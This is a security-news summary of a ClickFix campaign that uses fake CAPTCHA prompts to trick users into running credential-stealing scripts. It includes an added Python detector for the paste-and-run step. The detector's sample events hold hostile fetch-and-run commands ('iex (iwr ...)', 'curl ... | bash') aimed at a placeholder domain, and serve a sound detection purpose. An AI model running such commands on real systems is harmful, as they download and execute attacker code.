This ongoing campaign uses a combination of fake CAPTCHA prompts and manual script execution to trick users into compromising their own systems.
Social Engineering Tactics
Cybercriminals are combining fake CAPTCHA verification pages with a deceptive technique known as ClickFix to steal usernames and passwords. In this campaign, users are presented with a page that looks like a legitimate CAPTCHA challenge. Instead of verifying a user, the page prompts them to fix a supposed error by copying and running a malicious script.
Attack Execution and Targets
The attack chain begins when a user visits a compromised or malicious website. An overlay appears asking the user to complete a CAPTCHA. Following the instructions leads the user to paste a command into their terminal or run a PowerShell script. This action downloads malware that captures keystrokes and browser credentials. The campaign is broad and targets any organization that relies on password-based authentication, with no specific industry being singled out.
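A defender can hunt for the paste-and-run step described above in process-creation telemetry. The following is an added example, not code from the source article: it scores shell launches on a few heuristics, and the event layout, signal names, threshold and sample events are all assumptions constructed for illustration.

```python
import re

# Assumed input: (parent_image, image, command_line) tuples from process-creation
# telemetry such as EDR or Sysmon process-create events. The layout is hypothetical.
SHELL = re.compile(r"(?:^|[\\/])(powershell|pwsh|cmd|mshta|bash|sh|zsh)(\.exe)?$", re.I)
SIGNALS = {
    # Shell started from the desktop or a terminal, i.e. typed or pasted by a person.
    "user_parent": ("parent", re.compile(
        r"(?:^|[\\/])(explorer\.exe|windowsterminal\.exe|gnome-terminal-server)$", re.I)),
    "download": ("cmd", re.compile(
        r"\b(iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring|curl|wget)\b", re.I)),
    "execute": ("cmd", re.compile(r"\b(iex|invoke-expression)\b|\|\s*(ba|z)?sh\b", re.I)),
    "hidden": ("cmd", re.compile(r"-w(in(dowstyle)?)?\s+(h(idden)?|1)\b", re.I)),
    # Assumption: lure wording from the fake CAPTCHA page rides along in the pasted text.
    "lure_text": ("cmd", re.compile(r"captcha|not a robot|human verif", re.I)),
}

def score_event(parent, image, cmdline):
    """Return (score, matched signal names); score is 0 if the process is not a shell."""
    if not SHELL.search(image):
        return 0, []
    fields = {"parent": parent, "cmd": cmdline}
    hits = [name for name, (field, rx) in SIGNALS.items() if rx.search(fields[field])]
    return len(hits), hits

def flag_events(events, threshold=3):
    """Return indexes of events whose score reaches the threshold."""
    return [i for i, ev in enumerate(events) if score_event(*ev)[0] >= threshold]

# Constructed sample events; example.invalid is a reserved, non-resolving domain.
EVENTS = [
    (r"C:\Windows\explorer.exe",
     r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     'powershell -w hidden -c "iex (iwr https://example.invalid/v)" # I am not a robot - CAPTCHA check'),
    (r"C:\Windows\System32\services.exe",
     r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     r"powershell -File C:\Scripts\backup.ps1"),
    ("/usr/bin/gnome-terminal-server", "/usr/bin/bash",
     "curl -fsSL https://example.invalid/readme.txt -o readme.txt"),
    ("/usr/bin/gnome-terminal-server", "/bin/bash",
     "curl -s https://example.invalid/fix | bash # human verification"),
]

if __name__ == "__main__":
    for i, ev in enumerate(EVENTS):
        print(i, score_event(*ev))
```

Requiring several signals together keeps ordinary administration and developer downloads (the second and third sample events) below the threshold.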
Widespread Credential Theft Risk
The abuse of trusted web elements like CAPTCHAs makes this tactic particularly dangerous, as users are conditioned to obey such prompts. By tying the ClickFix social engineering method to credential theft, attackers bypass many traditional security controls. There are no specific CVEs associated with this general threat activity, as it exploits user behavior rather than a software vulnerability.
Source: Cyber Security News

